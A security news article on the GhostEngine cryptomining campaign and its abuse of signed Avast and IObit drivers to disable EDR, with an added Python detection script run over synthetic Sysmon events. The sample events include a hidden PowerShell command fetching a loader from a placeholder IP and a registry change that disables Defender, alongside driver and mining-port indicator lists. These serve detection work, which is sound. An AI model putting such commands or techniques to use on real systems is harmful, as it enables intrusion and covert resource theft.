GhostEngine: how hackers mine cryptocurrency using Avast drivers

Father

Even EDR solutions are powerless against such a well-thought-out campaign.

Elastic Security Labs and Antiy specialists have identified a new cryptocurrency mining campaign codenamed REF4578, in which GhostEngine malware uses vulnerable drivers to disable antivirus programs and launch the XMRig miner.

Elastic Security Labs and Antiy both noted the high complexity of the attack. In their reports the companies shared detection rules to help defenders identify and stop such attacks. However, neither report attributes the activity to a known group or gives details about the victims, so the origin and scope of the campaign remain unknown.

How GhostEngine works

It is not yet clear how the attackers gain their initial foothold on the servers, but the attack begins with the execution of a file named Tiworker.exe, which masquerades as the legitimate Windows Modules Installer Worker binary of the same name. This executable is only the first stage: GhostEngine itself is a PowerShell script that loads the remaining modules onto the infected host.

Once launched, Tiworker.exe downloads the script get.png from the C2 server; this script is the main GhostEngine loader. It fetches additional modules and their configurations, disables Windows Defender, enables remote services, and clears various Windows event logs.

The script checks for at least 10 MB of free disk space before continuing the infection, and creates scheduled tasks for persistence. It then downloads and runs the executable smartsscreen.exe, the core GhostEngine component. This component disables and removes EDR agents, then downloads and runs XMRig to mine cryptocurrency.

To neutralise security products, GhostEngine downloads two vulnerable drivers: aswArPots.sys (an Avast anti-rootkit driver) to terminate EDR processes from kernel mode, and IObitUnlockers.sys (an IObit driver) to delete the associated executables. Both are legitimately signed third-party drivers, which is what lets them load on a fully patched system (the bring-your-own-vulnerable-driver technique); the vulnerability is in what the driver allows a user-mode caller to do, not in how it is signed.

[Figure: GhostEngine infection chain]

Measures to protect yourself from GhostEngine

Elastic's researchers recommend that defenders watch for suspicious PowerShell executions, unusual process activity, and network traffic to cryptocurrency mining pools. The loading of known-vulnerable drivers and the creation of the corresponding kernel services should also be treated as suspicious.

As a preventive measure, block the creation of the vulnerable driver files aswArPots.sys and IObitUnlockers.sys on disk. Elastic Security also provided YARA rules in its report to help defenders detect GhostEngine infections.
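The hunting advice above, and the infection chain described earlier, can be turned into a small set of rules run over endpoint telemetry. The block below is an added example, not code from Elastic, Antiy or the article: it evaluates constructed Sysmon-style events (process create, network connection, driver load, file create, registry set) against the indicators the article names (Tiworker.exe, get.png, smartsscreen.exe, aswArPots.sys, IObitUnlockers.sys) and only raises a host when several independent stages of the chain line up. The mining-pool ports and hostname fragments, the Defender registry value, and all paths and addresses in the sample events are assumptions.

```python
"""Added example: rule-based detection of the GhostEngine chain over synthetic
Sysmon-style events. Not Elastic's or Antiy's published rules; indicator names
come from the article, everything else is an assumption."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

VULNERABLE_DRIVERS = {"aswarpots.sys", "iobitunlockers.sys"}   # from the article
LOADER_ARTEFACTS = ("get.png", "smartsscreen.exe", "tiworker.exe")  # from the article
MINING_PORTS = {3333, 4444, 5555, 14444}          # assumed stratum ports
MINING_HOST_HINTS = ("xmr", "monero", "stratum")  # assumed hostname fragments


@dataclass
class Event:
    event_id: int  # Sysmon: 1 process create, 3 network, 6 driver load, 11 file create, 13 registry set
    host: str
    fields: Dict[str, str]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_loader(ev: Event) -> Optional[str]:
    """PowerShell whose command line references a GhostEngine stage artefact."""
    if ev.event_id != 1:
        return None
    image = basename(ev.fields.get("Image", ""))
    cmd = ev.fields.get("CommandLine", "").lower()
    if image in ("powershell.exe", "pwsh.exe") and any(a in cmd for a in LOADER_ARTEFACTS):
        return "loader"
    return None


def rule_driver_dropped(ev: Event) -> Optional[str]:
    """File create of a known-vulnerable driver: the point a file-creation block would stop."""
    if ev.event_id == 11 and basename(ev.fields.get("TargetFilename", "")) in VULNERABLE_DRIVERS:
        return "driver_dropped"
    return None


def rule_kernel_service(ev: Event) -> Optional[str]:
    """Services\\<name>\\ImagePath set to a .sys outside System32\\drivers."""
    if ev.event_id != 13:
        return None
    key = ev.fields.get("TargetObject", "").lower()
    value = ev.fields.get("Details", "").lower()
    if "\\services\\" in key and key.endswith("\\imagepath") \
            and value.endswith(".sys") and "\\system32\\drivers\\" not in value:
        return "kernel_service"
    return None


def rule_driver_loaded(ev: Event) -> Optional[str]:
    """Driver load matched by name. Both drivers carry valid signatures, so a
    signature check alone passes them; production rules should match the
    Sysmon Hashes field against a driver blocklist instead of the file name."""
    if ev.event_id == 6 and basename(ev.fields.get("ImageLoaded", "")) in VULNERABLE_DRIVERS:
        return "driver_loaded"
    return None


def rule_defender_disabled(ev: Event) -> Optional[str]:
    """Policy value that switches Defender off (assumed: script uses the registry)."""
    key = ev.fields.get("TargetObject", "").lower()
    details = ev.fields.get("Details", "").strip()
    if ev.event_id == 13 and key.endswith("\\windows defender\\disableantispyware") \
            and (details == "1" or details.endswith("(0x00000001)")):
        return "defender_disabled"
    return None


def rule_mining_traffic(ev: Event) -> Optional[str]:
    """Outbound connection that looks like a mining pool (heuristics are assumptions)."""
    if ev.event_id != 3:
        return None
    port = int(ev.fields.get("DestinationPort", "0") or 0)
    host = ev.fields.get("DestinationHostname", "").lower()
    if port in MINING_PORTS or any(h in host for h in MINING_HOST_HINTS):
        return "mining_traffic"
    return None


RULES: List[Callable[[Event], Optional[str]]] = [
    rule_loader, rule_driver_dropped, rule_kernel_service,
    rule_driver_loaded, rule_defender_disabled, rule_mining_traffic,
]


def stages_per_host(events: List[Event]) -> Dict[str, List[str]]:
    """Distinct chain stages seen on each host, in order of first sighting."""
    seen: Dict[str, List[str]] = defaultdict(list)
    for ev in events:
        for rule in RULES:
            stage = rule(ev)
            if stage and stage not in seen[ev.host]:
                seen[ev.host].append(stage)
    return dict(seen)


def suspected_hosts(events: List[Event], min_stages: int = 3) -> List[str]:
    """Hosts where enough independent stages line up to call it a chain, not a one-off."""
    return sorted(h for h, s in stages_per_host(events).items() if len(s) >= min_stages)


SAMPLE_EVENTS = [  # constructed telemetry, not real logs
    Event(1, "srv01", {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       "ParentImage": r"C:\Windows\Tiworker.exe",
                       "CommandLine": 'powershell -nop -w hidden -c "iwr http://203.0.113.5/get.png"'}),
    Event(13, "srv01", {"TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
                        "Details": "DWORD (0x00000001)"}),
    Event(11, "srv01", {"TargetFilename": r"C:\Windows\Temp\aswArPots.sys"}),
    Event(13, "srv01", {"TargetObject": r"HKLM\System\CurrentControlSet\Services\aswArPots\ImagePath",
                        "Details": r"C:\Windows\Temp\aswArPots.sys"}),
    Event(6, "srv01", {"ImageLoaded": r"C:\Windows\Temp\aswArPots.sys", "Signed": "true"}),
    Event(3, "srv01", {"Image": r"C:\Windows\Temp\smartsscreen.exe",
                       "DestinationHostname": "xmr.pool.example", "DestinationPort": "3333"}),
    # Benign noise on a second host: an admin's PowerShell and a browser on 443.
    Event(1, "ws02", {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                      "CommandLine": "powershell Get-Service -Name Spooler"}),
    Event(3, "ws02", {"Image": r"C:\Program Files\Browser\browser.exe",
                      "DestinationHostname": "www.example.org", "DestinationPort": "443"}),
]

if __name__ == "__main__":
    print(stages_per_host(SAMPLE_EVENTS))
    print(suspected_hosts(SAMPLE_EVENTS))
```

Each rule on its own is noisy (an admin can legitimately run PowerShell, and a pool-like hostname can be a false positive), which is why `suspected_hosts` requires several distinct stages on the same host before it fires; the driver rules are the strongest single signals, and in production should key on hashes rather than file names, since the attacker controls the name on disk.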

Although the researchers found no significant sums in the single payment ID they examined, each victim may be assigned a unique wallet, so the total financial damage could be substantial.